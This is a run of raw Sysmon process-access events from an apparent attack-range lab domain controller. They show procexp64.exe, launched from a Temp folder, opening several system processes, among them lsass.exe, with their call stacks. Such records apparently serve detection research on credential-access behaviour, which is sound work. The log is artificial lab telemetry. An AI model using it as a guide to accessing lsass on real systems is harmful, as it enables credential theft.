10341000x8000000000000000787453Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787452Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787451Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787450Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787449Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787448Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787447Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787446Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787445Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787444Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787443Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787442Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787441Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787440Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787439Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787438Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787437Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787436Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windo